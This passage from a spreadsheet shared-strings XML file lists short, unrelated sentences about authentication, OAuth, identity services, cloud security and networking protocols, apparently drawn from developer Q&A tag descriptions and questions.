    <t>A simpler solution would be to use an instance-based firewall to terminate the VPN, instead of the built-in VPC VPN service, because then the firewall instance could allow the traffic to hairpin through itself, source-masquerading (NAT) the traffic behind its own EIP, and this would be something the VPC infrastructure easily supports.</t>
  </si>
  <si>
    <t>REST API Automation
Create services automatically to increase standardization, governance, and compliance while reducing cost, complexity, and confusion.</t>
  </si>
  <si>
    <t>When I use JSON file provided on console while creating the service account, to create GoogleCredentials object, it has serviceAccountProjectID field set to appropriate value, however when I use Application Default Credentials(on compute engine vm bound to the same service account) to get the GoogleCredentials, the serviceAccountProjectID is set to null.</t>
  </si>
  <si>
    <t>You can reach this by visiting http://DEVICEIPADDRESS:8080 
The default credentials are:
U:Administrator 
P:p@ssw0rd
Within the portal, you can provision and deploy apps remotely using the App Manager by selecting "Apps" along the left-hand pane.</t>
  </si>
  <si>
    <t>HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using HTTP.</t>
  </si>
  <si>
    <t>This question concerns non-standard controls, developed by third party developers or companies.</t>
  </si>
  <si>
    <t>This means that it offers a set of web services for authenticating users and programmatic clients against Active Directory, creating security tokens that can be used as sign-in tickets for web applications and web services.</t>
  </si>
  <si>
    <t>Rather than using a config file (a la Declarative Authorization), roles, permissions and access control is defined in the application's controllers and models.</t>
  </si>
  <si>
    <t>However, in terms of the application of computer networking protocols and concepts, it may be best to view WANs as computer networking technologies used to transmit data over long distances, and between different LANs, MANs and other localised computer networking architectures.</t>
  </si>
  <si>
    <t>Object replication
Auto-patching of game binaries
Lobbies
RPC
Voice comms
NAT tunneling
Robust communications protocols</t>
  </si>
  <si>
    <t>API Platform contains a set of tools to build with ease fully-featured hypermedia APIs (modern formats, docs, authorization, filtering, ordering, cache, testing...) and to scaffold clients apps.</t>
  </si>
  <si>
    <t>The BlackMagic ATEM Television Studio can do simple processing on multiple unencrypted HDMI signals, and has an API you can tie into (not easily, but doable.)</t>
  </si>
  <si>
    <t>Since with the Graph API, only one account can be logged in at the same time, i made a new MS Account and imported shared read only calendars, from other persons MS Accounts.</t>
  </si>
  <si>
    <t>Mailgun is an online service that provides a set of APIs for sending, receiving, tracking and storing email.</t>
  </si>
  <si>
    <t>Security Framework is an iOS and OSX API, which provides Authorization Services; Certificate, Key, and Trust Services; Cryptographic Message Syntax Services; and Keychain Services.</t>
  </si>
  <si>
    <t>It can also function as an OAuth 2.0 Resource Server, validating access tokens presented by OAuth 2.0 clients against an OAuth 2.0 Authorization Server.</t>
  </si>
  <si>
    <t>Using the Authlete Web APIs or example implementations, you can easily add OAuth 2.0 and OpenID Connect to your app / web site.</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol Secure (HTTPS) is a combination of the Hypertext Transfer Protocol with the SSL/TLS protocol to provide encrypted communication and secure identification of a network web server.</t>
  </si>
  <si>
    <t>The Developer ID allows Gatekeeper to block apps created by malware developers and to verify that apps havent been tampered with.</t>
  </si>
  <si>
    <t>Our goal is to create a fast, secure, compliant web mail client that has great usability.</t>
  </si>
  <si>
    <t>As previously mentioned, OpenID Connect provide ability to authorize and authenticate using identities stored in a common location.</t>
  </si>
  <si>
    <t>Google provides an API to allow developers to integrate a secure and quick way in their apps to log their users in using a registration system they are already using and trust most.</t>
  </si>
  <si>
    <t>The Thread specification defines an IPv6-based reliable, secure and low-power wireless device-to-device communication protocol for home applications.</t>
  </si>
  <si>
    <t>However, Postfix is specifically intended to be fast, easy to administer, and secure, and will deviate from Sendmail convention when necessary to achieve those goals.</t>
  </si>
  <si>
    <t>AWS Landing Zone is a solution that helps customers more quickly set up a secure, multi-account AWS environment based on AWS best practices.</t>
  </si>
  <si>
    <t>However, the developer dashboard doesn't seem to be set up that way, it looks as if I would have to create an "App" and then using OAuth 2.0 the individual members would have to grant the "App" access to their calendar.</t>
  </si>
  <si>
    <t>I am going to secure my web service, based on soap messages but I am thinking to go through rest, deployed on Tomcat 7 on Raspberry Pi 2 (Cpu 900 Mhz, 1Gb Ram).</t>
  </si>
  <si>
    <t>Network service providers don't allow inbound connections because a single public IP address is shared by many subscribers.</t>
  </si>
  <si>
    <t>API which provides a secure way to store customer credit cards on PayPal servers, instead of saving them on developer-specific servers.</t>
  </si>
  <si>
    <t>The user enters credentials (username and password) once per account, granting applications access to online resources with "one-click" approval.</t>
  </si>
  <si>
    <t>It is used to build APIs that enable mobile apps, developer communities, and any other consumer controlled access to your applications using PHP.</t>
  </si>
  <si>
    <t>OPC (Open Platform Communications) is the interoperability standard for the secure and reliable exchange of data in the industrial automation space.</t>
  </si>
  <si>
    <t>Using only a Web browser and limited programming experience, you can develop and deploy applications that are fast and secure.</t>
  </si>
  <si>
    <t>Kerberos is a single sign-on (SSO) network authentication protocol designed to allow nodes, communicating over a non-secure network, to prove their identity to one another in a secure manner.</t>
  </si>
  <si>
    <t>Trustzone is an architecture to allow CPU sharing in cases where a traditional dedicated 'secure CPU' may have been used.</t>
  </si>
  <si>
    <t>Worldpay provides online payment services in several modes including redirect, XML service and hosted services.</t>
  </si>
  <si>
    <t>Using a dedicated hosting service offers the benefits of high performance, security, email stability, and control.</t>
  </si>
  <si>
    <t>Confidential clients are clients who have previously agreed secret shared between OpenID Connect provider.</t>
  </si>
  <si>
    <t>You may rely on instances of FIWARE GEris linked to the Data/Media Context Management chapter, the IoT Services Enablement chapter, the Advanced Web-based User Interface chapter or some GEris of the Applications/Services Ecosystem and Delivery Framework chapter (WireCloud) as well as the Security chapter (Access Control).</t>
  </si>
  <si>
    <t>It comes with a built-in MVC 6 controller and native views that you can easily replace by your own ones to fully customize your login experience.</t>
  </si>
  <si>
    <t>Apache Sentry is a system for enforcing fine grained role based authorization to data and metadata stored on a Hadoop cluster.</t>
  </si>
  <si>
    <t>Vault is: A commercial, proprietary revision control system by SourceGear LLC which markets its product as a replacement for Microsoft's Visual Source Safe, a secret management tool by HashiCorp or a secrets service by Azure (Azure Key Vault).</t>
  </si>
  <si>
    <t>A reliable multicast protocol is a computer networking protocol that provides a reliable sequence of packets to multiple recipients simultaneously, making it suitable for applications like multi-receiver file transfer.</t>
  </si>
  <si>
    <t>The platform consists of many Kits or SDKs - Answers, Crashlytics, Digits,  AdMob and others that address many of the major issues faced by developers, such as stability, distribution, and revenue and identity.</t>
  </si>
  <si>
    <t>Service Bus Relay offers the ability to publish a WCF endpoint in the cloud, acting as a bridge to bypass firewalls, allowing duplex operations.</t>
  </si>
  <si>
    <t>Neblio is a secure, distributed, platform built for enterprise applications and services.</t>
  </si>
  <si>
    <t>Privileged Account Management is a key functionality of the Oracle Identity Governance platform which provides central governance for both regular users and privileged users, complete auditing, reporting and certification of users regular accounts and shared accounts, and lifecycle management from request, approval, to certification and usage tracking.</t>
  </si>
  <si>
    <t>Regarding the identity translation pattern, what are the benefits there other then having credentials/Identity per device allowing for blacklisting and having higher limits and quotas per device?</t>
  </si>
  <si>
    <t>This capability is particularly useful for enterprise-approved apps deployed to a managed profile.</t>
  </si>
  <si>
    <t>Azure Backup Vault are based on Azure Service Manager, were the first version of the vault.</t>
  </si>
  <si>
    <t>The concept of linking a single individual's digital identity across multiple (and usually disparate) IT systems.</t>
  </si>
  <si>
    <t>As a platform, you can use Connect to spin up accounts and enable payments for your sellers with as much custom control over the experience as youd like.</t>
  </si>
  <si>
    <t>Optional Kerberos-based authentication
DNS-based naming and other network information
Features include:
Central location for network administration and security
Information security and single sign-on for user access to networked resources
The ability to scale up or down easily
Standardizing access to application data
Synchronization of directory updates across servers</t>
  </si>
  <si>
    <t>JOSE (Javascript Object Signing and Encryption) is a framework intended to provide a method to securely transfer claims (such as authorization information) between parties
The JOSE framework provides a collection of specifications to serve this purpose.</t>
  </si>
  <si>
    <t>JGroups comes with a large number of protocols, for example:
Transport protocols: udp (IP Multicast) or tcp
Fragmentation of large messages
Reliable unicast and multicast message transmission
Failure detection: crashed nodes are excluded from the membership
Flow control to prevent slow receivers to get overrun by fast senders
Ordering protocols: FIFO, Total Order
Membership
Encryption
Compression</t>
  </si>
  <si>
    <t>I am looking for resources including code examples in C# backend and documentation for programmatic device enrollment using Device Provisioning Service for Symmetric Key.</t>
  </si>
  <si>
    <t>angular-permission is a simple angular library to manage roles and permissions based access control for angular applications.</t>
  </si>
  <si>
    <t>From the Linux HowTo guide:
OpenSSH is one of the most widely used and powerful tool available for Linux, that allows you to connect securely to remote Linux systems via a shell and allows you to transfer files securely to and from remote systems.</t>
  </si>
  <si>
    <t>You can use this API to build solutions that authenticate once through Microsoft Graph and make a single API call to access or act on security insights from multiple sources.</t>
  </si>
  <si>
    <t>Start and verify installation
sudo service jenkins start
tail /var/log/jenkins/jenkins.log -fand wait for Jenkins is fully up and running
Now try that it is actually up 
wget localhost:8080 &amp;&amp; nano index.html</t>
  </si>
  <si>
    <t>WebSEAL can provide single sign-on solutions and incorporate back-end Web application server resources into its security policy.</t>
  </si>
  <si>
    <t>The Fabric platform is made of three modular kits that address some of the most common and pervasive challenges that all app developers face: stability, distribution, revenue and identity.</t>
  </si>
  <si>
    <t>Face recognition is built into cameras, social networking sites (like Facebook), photo sharing sites (like PicasaWeb), and smart phones (like modern iPhone and Android phones).</t>
  </si>
  <si>
    <t>Federated processing is a delegation of method invocation calls to trusted third party APIs or web services.</t>
  </si>
  <si>
    <t>Allows anyone to have a disposable, flexible, container based Selenium Grid infrastructure featuring video recording, live preview, basic auth &amp; online/offline dashboards</t>
  </si>
  <si>
    <t>Facebook Connect is a set of APIs from Facebook that enable Facebook members to log onto third-party websites, applications, mobile devices and gaming systems with their Facebook identity.</t>
  </si>
  <si>
    <t>WireGuard's design seeks to reduce these issues, making the tunnel more secure and easier to manage by default.</t>
  </si>
  <si>
    <t>In Role Based Access Control (RBAC), an authorization decision may be dependent upon the identity of the user - whether the user is a member of a given role or group.</t>
  </si>
  <si>
    <t>creating persistent settings for a single app
For UWP, each app has system-defined root directories that you can use it for storing.</t>
  </si>
  <si>
    <t>You can view this in Cognito &gt; Federated Identities &gt; Click blue link with "Name of your identity pool here" &gt; Edit identity pool (top right) and your identity pool ID is at the top.</t>
  </si>
  <si>
    <t>Gemalto is an international digital security company providing software applications, secure personal devices such as smart cards and tokens in addition to managed services.</t>
  </si>
  <si>
    <t>The syslog-ng application is a flexible and highly scalable system logging application that is ideal for creating centralized and trusted logging solutions.</t>
  </si>
  <si>
    <t>Installed applications that need to exchange information with Google services protected by a user's Google or Google Apps (hosted) account can use a programmatic method for getting authorized access.</t>
  </si>
  <si>
    <t>It stores all applications files in a format that can be submitted to the App Store for review, and contains a digital signature identifying the developer.</t>
  </si>
  <si>
    <t>Finally, any extensions (i.e., IServiceBehavior) to the services that are registered with the container will be automatically applied to all services registered with the container.</t>
  </si>
  <si>
    <t>Apache Ranger has the following goals:
Centralized security administration to manage all security related tasks in a central UI or using REST APIs.</t>
  </si>
  <si>
    <t>Check Point Software Technologies is a widely deployed brand of firewalls and other security and networking products.</t>
  </si>
  <si>
    <t>Instead, it focuses on making the materialization as fast as possible, with no overheads from things like identity managers - just "run this query and give me the (typed) data".</t>
  </si>
  <si>
    <t>Oauth - is an open protocol to allow secure API authorization in a simple and standard method from desktop and web applications.</t>
  </si>
  <si>
    <t>The ParseKit Framework offers 3 basic services of general interest to Cocoa developers:
String Tokenization via the Objective-C  and PKToken classes.</t>
  </si>
  <si>
    <t>Using Shibboleth-enabled access simplifies management of identity and permissions for organizations supporting users and applications.</t>
  </si>
  <si>
    <t>RADIUS, Remote Authentication Dial In User Service, is a networking protocol that provides centralized Authentication, Authorization, and Accounting (AAA) management for computers to connect and use a network service.</t>
  </si>
  <si>
    <t>The SSH File Transfer Protocol (also Secret File Transfer Protocol, Secure FTP, or SFTP) is a network protocol that provides file access, file transfer, and file management functionality over any reliable data stream.</t>
  </si>
  <si>
    <t>The goal of code-access security is most often to protect functionality from competitors, to prevent reverse-engineering, or to preserve integrity of program communication protocols.</t>
  </si>
  <si>
    <t>I know that the secure daemon uses the TPM for a few things, and all of our devices have TPM 2.0 chips, we're using the TPM endorsement keys with the DPS.</t>
  </si>
  <si>
    <t>A keychain is an encrypted container that holds passwords for multiple applications and secure services.</t>
  </si>
  <si>
    <t>The BIG-IPs features are concerned with making applications run fast, highly-available, and secure.</t>
  </si>
  <si>
    <t>www.pubnub.com
PubNub is a secure global Data Stream Network (DSN) and easy to use API that enables our customers to build, scale, and manage real-time functionality for their applications and IoT devices.</t>
  </si>
  <si>
    <t>Sailpoint or IIQ is a Identity management system which is developed by Sailpoint and its one of the top most identity management solution used widely in world 
This is the niche skill and has less of effective documentation so there will be lots of questions.</t>
  </si>
  <si>
    <t>Kolab is a secure, scalable and reliable groupware server.</t>
  </si>
  <si>
    <t>Certificate Manage is an offering by Amazon Web Services.</t>
  </si>
  <si>
    <t>Google Domains is a domain registration service offered by Google.</t>
  </si>
  <si>
    <t>An authentication plugin for Rails 3 and 4, inspired by restful_authentication, Devise and Authlogic with a focus on minimalism.</t>
  </si>
  <si>
    <t>Users must now use Oauth2 or a service account to access users data.</t>
  </si>
  <si>
    <t>Ecspecially for mobile users, all while helping users keep their accounts secure.</t>
  </si>
  <si>
    <t>Windows Azure Active Directory Access Control support several standards widely used in authentication and authorization of web applications, such as OAuth, SAML and WS-Trust.</t>
  </si>
  <si>
    <t>In contrast to commercial storage services, ownCloud can be installed on a private server at no additional cost.</t>
  </si>
  <si>
    <t>Secure Configuration  The configuration of the Amazon Linux AMI enhances security by focusing on two main security goals: limiting access and reducing software vulnerabilities.</t>
  </si>
  <si>
    <t>It has endpoints for managing user accounts and for registering OAuth2 clients, as well as various other management functions.</t>
  </si>
  <si>
    <t>A Windows domain account is an account in Windows domain, which includes accounts of users, computers , printers and other security principals registered with a central database (called Active Directory Service) located on domain controllers.</t>
  </si>
  <si>
    <t>A Windows domain account is an account in Windows domain, which includes accounts of users, computers, printers and other security principals registered with a central database (called Active Directory Service) located on domain controllers.</t>
  </si>
  <si>
    <t>Key concepts for decentralized identity such as Decentralized Identifiers,
Verifiable Claims, Privacy &amp; Security Requirements for Storage &amp; Compute are standardized by the following bodies:
Decentralized Identity Foundation
W3C Credentials Community Group</t>
  </si>
  <si>
    <t>Remote Controlling
This is the part I'm very unsure about, I would like to control the LED that's connected to the Raspberry PI through Cloud2Device communication in my dashboard page.</t>
  </si>
  <si>
    <t>Vault is a tool developed by HashiCorp for secure secrets management, centralized key management, and simple APIs for data encryption</t>
  </si>
  <si>
    <t>In laymans terms: You can use one OpenID-Server or OP to provide a simple authentication (not authorization) mechanism for multiple other sites, the RPs (formerly called consumers).</t>
  </si>
  <si>
    <t>Connect millions of devices across platforms
The rapid proliferation of connected devices raises challenges due to the variety of platforms and protocols involved.</t>
  </si>
  <si>
    <t>VMware vCloud Director provisions software-defined data center services as virtual data centers that provide virtualized compute, networking, storage and security.</t>
  </si>
  <si>
    <t>Project Calico aims to simplify, scale, and secure cloud networks.</t>
  </si>
  <si>
    <t>For web authentication (it could be a full mobile app with a web component) the IS server offers
 - OAuth with code or implicit grand 
 - OIDC
 - SAML SSO Authentication 
There's even an admin API server (a SOAP web service) to validate user credentials, but I don't think it is (or should be) used in this case.</t>
  </si>
  <si>
    <t>The AWS documentation [1] describes the service as following:
AWS IoT provides secure, bi-directional communication between Internet-connected devices such as sensors, actuators, embedded micro-controllers, or smart appliances and the AWS Cloud.</t>
  </si>
  <si>
    <t>For questions regarding the appropriate use, settings, and enforcement of user permissions, typically for the purpose of either providing access to shared resources or restricting access to private resources.</t>
  </si>
  <si>
    <t>Security questions related to SSL (Secure Sockets Layer), a protocol that provides privacy (encryption) and data integrity over a network connection.</t>
  </si>
  <si>
    <t>Developers making apps using the iOS Enterprise Developer Program know that private APIs can change in the future but often have good reasons.</t>
  </si>
  <si>
    <t>Mifos X is an extended platform for delivering the complete range of financial services needed for an effective financial inclusion solution.</t>
  </si>
  <si>
    <t>GridFTP is a high-performance, secure, reliable data transfer protocol optimized for high-bandwidth wide-area networks.</t>
  </si>
  <si>
    <t>Signalling protocols are used to establish VoIP sessions while the Media Protocols carry actual voice traffic.</t>
  </si>
  <si>
    <t>Flurry is a free, commercial service, owned by Yahoo, which provides monetization solutions for app publishers, anonymous usage statistics of apps and error/crash reports for apps on mobile devices.</t>
  </si>
  <si>
    <t>The Membership API can work in concert with Role and Profile providers to provide a complete solution for authenticating, authorizing, and storing application-specific information about users in an ASP.NET application.</t>
  </si>
  <si>
    <t>OpenID achieves this goal by providing a framework in which users can establish an account with an OpenID provider, such as Google, and use that account to sign into any web site that accepts OpenIDs.</t>
  </si>
  <si>
    <t>SocialAuth is a Java library (.NET port &amp; Android version available) for you if your web application requires:
Authenticating users through external oAuth providers like Gmail, Hotmail, Yahoo, Twitter, Facebook, LinkedIn, Foursquare, MySpace, Salesforce, Yammer as well as through OpenID providers like myopenid.com.</t>
  </si>
  <si>
    <t>PAYMILL offers an innovative payment solution which enables online businesses and services to accept card payments on their websites.</t>
  </si>
  <si>
    <t>The library also includes the following features:
 * Basic user details are transfered from the OpenID server via the Simple Registration extension.</t>
  </si>
  <si>
    <t>ActiveState Stackato is a secure, stable, and commercially supported Platform-as-a-Service (PaaS) that is built with and on top of various open source components such as Cloud Foundry and Docker.</t>
  </si>
  <si>
    <t xml:space="preserve"> (or just "Modules" hereafter) let developers factor large applications into logical components that can share stateful services and communicate in a secure fashion.</t>
  </si>
  <si>
    <t>Authenticators (which may be written by third parties) handle the actual details of validating account credentials and storing account information.</t>
  </si>
  <si>
    <t>), wired and wireless link layer protocols (Ethernet, PPP, IEEE 802.11, etc), support for mobility, MANET protocols, DiffServ, MPLS with LDP and RSVP-TE signalling, several application models, and many other protocols and components.</t>
  </si>
  <si>
    <t>OpenIddict fully supports the code/implicit/hybrid flows and the client credentials/resource owner password grants.</t>
  </si>
  <si>
    <t>Vault can manage static and dynamic secrets such as application data, username/password for remote applications/resources and provide credentials for external services such as MySQL, PostgreSQL, Apache Cassandra, Consul, AWS and more.</t>
  </si>
  <si>
    <t>The Shibboleth software implements widely used federated identity standards, principally OASIS' Security Assertion Markup Language (SAML), to provide a federated single sign-on and attribute exchange framework.</t>
  </si>
  <si>
    <t>Instead of just focusing on user identities, roles, and groups, ABAC defines attributes (key-value pairs) that can be used to describe users, resources, actions, and context.</t>
  </si>
  <si>
    <t>Referring to How to Use Your Own Identity and Access Management Systems to Control Access to AWS IoT Resources
, you can create your custom-authorizer.</t>
  </si>
  <si>
    <t>It provides advanced session management, secure remote access, file transfer, and data tunneling.</t>
  </si>
  <si>
    <t>In cryptography, X.509 is a standard for a public key infrastructure (PKI) for single sign-on (SSO) and Privilege Management Infrastructure (PMI).</t>
  </si>
  <si>
    <t>Karafka is a framework for Ruby applications using the decentralized streaming platform Kafka.</t>
  </si>
  <si>
    <t>Auth0 is a platform for modern identity.</t>
  </si>
  <si>
    <t>With AWS Certificate Manager, you can quickly request a certificate,
  deploy it on AWS resources such as Elastic Load Balancers or Amazon
  CloudFront distributions, and let AWS Certificate Manager handle
  certificate renewals.</t>
  </si>
  <si>
    <t>With AWS Certificate Manager, you can quickly request a certificate, deploy it on AWS resources such as Elastic Load Balancers or Amazon CloudFront distributions, and let AWS Certificate Manager handle certificate renewals.</t>
  </si>
  <si>
    <t>I am confused on how to secure the communication between the Cloud server and the ESP8266 module.</t>
  </si>
  <si>
    <t>I need a secure way to store the data in AWS and get this to an external customer.</t>
  </si>
  <si>
    <t>Simple Service Discovery Protocol (SSDP) is a protocol for advertizing and discovering services on the network.</t>
  </si>
  <si>
    <t>Datagram Transport Layer Security (DTLS) is a protocol that provides communications privacy for datagram protocols.</t>
  </si>
  <si>
    <t>TrueVault offers healthcare applications a secure HIPAA compliant API to store health data.</t>
  </si>
  <si>
    <t>if you mean the oauth implementation from twitter, use [twitter-oauth] instead</t>
  </si>
  <si>
    <t>GeneXus Access Manager - A mechanism to provide GeneXus applications a single, centralized scheme for authentication and authorization.</t>
  </si>
  <si>
    <t>It is widely used to secure standalone web applications, portlets and increasingly REST applications.</t>
  </si>
  <si>
    <t>KeyStone service is shared for same credential to access multi-region, and Horizon functions as the unified portal for the multi-region cloud.</t>
  </si>
  <si>
    <t>Secure Shell (SSH) is a cryptographic network protocol for secure data communication.</t>
  </si>
  <si>
    <t>Couchdb-lite or Couchbase Lite is an ultra-lightweight, reliable, secure JSON database built for online/offline mobile application needs.</t>
  </si>
  <si>
    <t>Its flagship products are Access Manager, AppManager, Secure Configuration Manager, Sentinel, and Identity Manager.</t>
  </si>
  <si>
    <t>Protocols which provide reliable communication over such networks use a combination of acknowledgments (i.e.</t>
  </si>
  <si>
    <t>Each container is an isolated and secure app platform.</t>
  </si>
  <si>
    <t>Huawei Technologies is a Chinese multinational networking and telecommunications equipment and services company.</t>
  </si>
  <si>
    <t>Define roles and permissions to manage authorization of users and organizations.</t>
  </si>
  <si>
    <t>Cryptography algorithms (like SSL) are widely deployed in various networking areas to combat this.</t>
  </si>
  <si>
    <t>Fossil is a simple and flexible distributed version control system that includes a wiki, source control management, and a bug-tracker in a single executable.</t>
  </si>
  <si>
    <t>is an extension of the Simple Mail Transfer Protocol whereby an SMTP client may log in, using an authentication mechanism chosen among those supported by the SMTP server.</t>
  </si>
  <si>
    <t>Built on the same enterprise-grade secure platform as Azure AD, Azure AD B2C keeps your applications, your business, and your customers protected.</t>
  </si>
  <si>
    <t>Using the role based access control feature in Cognito Federated Identities will make sure that the credentials are assumed using the role assigned to the Cognito User Pools group to which user belongs.</t>
  </si>
  <si>
    <t>A secure and interoperable WCF binding that is designed for use with duplex service contracts that allows both services and clients to send and receive messages.</t>
  </si>
  <si>
    <t>There are three patterns for using an IoT Edge device as a gateway: transparent, protocol translation, and identity translation, you can refer to this link to get more introduction about these three pattern.</t>
  </si>
  <si>
    <t>To produce secure mobile applications, you must apply security principles and techniques to the implementation and configuration of your Worklight mobile applications, adapters, data, and web resources.</t>
  </si>
  <si>
    <t>Long story
Each user have an account (Web based application) and he/she is logged into account and upload some images/videos into his account (Stored AWS S3 buckets).</t>
  </si>
  <si>
    <t>IBM Worklight security framework makes available security principles and techniques to implement and configure a secure Worklight mobile apps, adapters, data and web resources.</t>
  </si>
  <si>
    <t>You can use RSA SecurID Access to regain control of a disrupted perimeter with strong, secure access and single sign-on to the leading Web and SaaS applications, native mobile apps, and legacy resources (including VPNs, firewalls, virtual desktops and Windows or Linux servers).</t>
  </si>
  <si>
    <t>It works with all flavors of .NET including ASP.NET, Xamarin, Unity and UWP apps helping organizations secure their trade secrets (IP), reduce piracy/counterfeiting and prevent tampering of their applications and hindering data breaches.</t>
  </si>
  <si>
    <t>As a replacement for the discontinued gadgets, Windows have introduced the Windows Apps, which are more secure and there already is a great number of good apps on the Windows Store.</t>
  </si>
  <si>
    <t>It provides:
A library of containerized components for all vital aspects of a container system: OS, container runtime, orchestration, infrastructure management, networking, storage, security, build, image distribution, etc.</t>
  </si>
  <si>
    <t>Microsoft cryptographic technologies include CryptoAPI, Next Generation (CNG), Cryptographic Service Providers (CSP), CryptoAPI Tools, CAPICOM, WinTrust, issuing and managing certificates, and developing customizable public key infrastructures.</t>
  </si>
  <si>
    <t>When you create a package for your desktop application, your
  application will get an identity and with that identity, your desktop
  application has access to Windows Universal Platform (UWP) APIs.</t>
  </si>
  <si>
    <t>Developed with Mistral, the 8148 Evaluation Module (EVM) enables developers to immediately start evaluating DM814x DaVinci digital media processors (DM8148, DM8147, DM8146 and AM387x Sitara ARM MPUs (AM3874, AM3872, AM3871) and begin building solutions such as surveillance DVRs, video conferencing systems, video broadcasting systems, media servers, single-board computers, gateways, routers, servers, industrial automation, human machine interfaces (HMIs), point-of-service data terminals, amongst many others.</t>
  </si>
  <si>
    <t>Detailed information about App sandboxing can be found in Apple's Developer Center.</t>
  </si>
  <si>
    <t>In cryptography, X.509 is an ITU-T standard for a public key infrastructure (PKI) for single sign-on (SSO) and Privilege Management Infrastructure (PMI).</t>
  </si>
  <si>
    <t>A reliable multicast protocol is a computer networking protocol that provides a reliable sequence of packets to multiple recipients simultaneously</t>
  </si>
  <si>
    <t>It allows fine-grained control over app permissions.</t>
  </si>
  <si>
    <t>IntelliLock is an advanced 100% managed solution for licensing controls and applications.</t>
  </si>
  <si>
    <t>Huawei Technologies Co. Ltd. is a Chinese multinational networking and telecommunications equipment and services company headquartered in Shenzhen, Guangdong.</t>
  </si>
  <si>
    <t>It provides access to user accounts stored in the Accounts database.</t>
  </si>
  <si>
    <t>It provides a one-stop identity service across Microsoft Azure, Microsoft Office 365, Dynamics CRM Online, Microsoft Intune and other 3rd party cloud services.</t>
  </si>
  <si>
    <t>This is an Android Library Project that provides multiple means to improve network security in mobile applications.</t>
  </si>
  <si>
    <t>A JSON Web Token (JWT) contains claims that can be used to allow a system to apply access control to resources it owns.</t>
  </si>
  <si>
    <t>Shiro's API provides mechanisms to secure a variety of application types, including mobile software, web apps, and enterprise systems.</t>
  </si>
  <si>
    <t>I want the network to be secured, I can use the Xbee's AES capability to make the data transfer secure.</t>
  </si>
  <si>
    <t>Or are cookies secured on an IP-basis, not a domain-basis?</t>
  </si>
  <si>
    <t>Thought is to have similar cloud and on-premise solution(behind a firewall).</t>
  </si>
  <si>
    <t>You can go to that gmail account setting and look for "Allow less secure apps" and turn it on.</t>
  </si>
  <si>
    <t>The simplest reliable solution is probably Apache basic auth.</t>
  </si>
  <si>
    <t>To delegate authority this way, domain administrators can use service accounts with OAuth 2.0.</t>
  </si>
  <si>
    <t>A CodeIgniter Account Authentication &amp; Authorization package to accelerate development using OpenID &amp; Oauth</t>
  </si>
  <si>
    <t>Full HMAC auth implementation for use in the gems and Rails apps.</t>
  </si>
  <si>
    <t>CRUSH is an acronym for Controlled Replication Under Scalable Hashing.</t>
  </si>
  <si>
    <t>Connect makes it easy for you to interact with other Stripe accounts.</t>
  </si>
  <si>
    <t>Istio is an open-source platform for managing and securing microservices</t>
  </si>
  <si>
    <t>Azure AD managed identities for Azure resources.</t>
  </si>
  <si>
    <t>The angular-oauth2-oidc library is for managing Authentication and Authorization in an Angular app depending on an OAuth2 and OpenID Connect server.</t>
  </si>
  <si>
    <t>Steemit is a website for blogging and social networking that uses its blockchain-based platform for publishers.</t>
  </si>
  <si>
    <t>The UAF protocol allows online services to offer password-less and multi-factor security.</t>
  </si>
  <si>
    <t>Ethernet is a set of networking technologies widely used to interconnect computers.</t>
  </si>
  <si>
    <t>Access control is the process of limiting the access of ability of users or services to certain resources.</t>
  </si>
  <si>
    <t>It will:
Store the active users ID in the session, and let you log them in and out easily.</t>
  </si>
  <si>
    <t>For example , the Login/Register and the Accouny Dashborad where all the Customer related data may be stored is clubbed into one Customer Module.</t>
  </si>
  <si>
    <t>A middleware for OSGI frameworks that allows service providers to register services for remote access.</t>
  </si>
  <si>
    <t>Echoprint is a music fingerprint or music identification service.</t>
  </si>
  <si>
    <t>This does not mean that WSE is the solution to security in web services, it means that WSE was that solution until WCF was released.</t>
  </si>
  <si>
    <t>Refer development lifecycle and officially provided resources at 
https://wiki.hyperledger.org/display/fabric/
https://jira.hyperledger.org/secure/Dashboard.jspa?selectPageId=10104</t>
  </si>
  <si>
    <t>The SSO Agent is an access and authentication platform with a hybrid on-premise and cloud-based service architecture.</t>
  </si>
  <si>
    <t>This is also the place where developers can register their 3rd party applications for OAuth access.</t>
  </si>
  <si>
    <t>By November 2017, all Backup vaults have been upgraded to Recovery Services vaults.</t>
  </si>
  <si>
    <t>Applications can take advantage of advances in codec and filter technology transparently.</t>
  </si>
  <si>
    <t>Laravel also provides a simple way to organize authorization logic and control access to resources.</t>
  </si>
  <si>
    <t>Security
Make customers feel secure about shopping online.</t>
  </si>
  <si>
    <t>Cisco Systems is a widely deployed brand of networking and telecommunications gear.</t>
  </si>
  <si>
    <t>after device has been purchased / installed / deployed)
For distribution at manufacture or late manufacture, you generally are going to be installing the keys to the device using something that is physically connected to the device in a secure environment.</t>
  </si>
  <si>
    <t>Both web servers run as Windows services, require administrative rights for installation, include application management console program and programmatic application registration components, including application registration APIs and command-line utilities.</t>
  </si>
  <si>
    <t>https://azure.microsoft.com/en-us/blog/announcing-the-public-preview-of-windows-container-support-in-azure-app-service/
AppService can't open against the Intermediate Store to install a Certificate chain.</t>
  </si>
  <si>
    <t>32feet.NET is a shared-source project to make personal area networking technologies such as Bluetooth, Infrared (IrDA) and more, easily accessible from .NET code.</t>
  </si>
  <si>
    <t>The EUGeneral Data Protection Regulation (GDPR) replaces theData Protection Directive 95/46/EC and is designed to harmonize data privacy laws across Europe,toprotect and empower all EU citizens data privacy and to reshape the way organizations across the region approach data privacy</t>
  </si>
  <si>
    <t>On the other side, the Resources side, another federation server validates the token and issues another token for the local servers to accept the claimed identity.</t>
  </si>
  <si>
    <t>When access to a restricted resource is requested, access can be granted by checking to see if the requesting identity is associated with one or more of the role definitions permitted to access the resource.</t>
  </si>
  <si>
    <t>Centrify DirectControl controls authentication and privileges that user has to access across disparate systems and applications by extending Active Directory-based authentication, enabling use of Windows Group Policy and single sign-on (SSO).</t>
  </si>
  <si>
    <t>IBM MobileFirst Quality Assurance equips teams to capture tester and live user experience to continuously build and deliver high-quality mobile apps.</t>
  </si>
  <si>
    <t>Action Web Service provides a way to publish interoperable web service APIs with
Rails without spending a lot of time delving into protocol details.</t>
  </si>
  <si>
    <t>Docker Trusted Registry (DTR) is the enterprise-grade image storage solution from Docker.</t>
  </si>
  <si>
    <t>A Keychain can contain various types of data: passwords (for Websites, FTP servers, SSH accounts, network shares, wireless networks, groupware applications, encrypted disk images), private keys, certificates, and secure notes.</t>
  </si>
  <si>
    <t>Presentation (provides independence from differences in data representation (e.g., encryption))
Application (Communication partners are identified, quality of
service is identified, user authentication and privacy are
considere)
References
OSI Model on Wikipedia</t>
  </si>
  <si>
    <t>Both top-level containers are intended to be used together with :
